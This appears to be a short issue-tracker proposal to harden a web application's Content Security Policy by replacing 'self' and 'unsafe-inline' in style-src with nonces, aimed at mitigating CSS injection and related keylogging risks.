Replace 'self' and 'unsafe-inline' in the CSP's style-src with a nonce
Proposal
This is low priority compared to the rest of the CSP improvements, but we can replace 'self'
and 'unsafe-inline'
in the CSP's style-src
with a nonce. This would help mitigate CSS injection (and the associated risks like keylogging).
The work for this would also include making sure all our styles have nonces. I'm expecting it can be done in a similar way as !48093 (merged).
I tested locally and link
and style
support the nonce
attribute and it works even in Safari.
Edited by Dominic Couture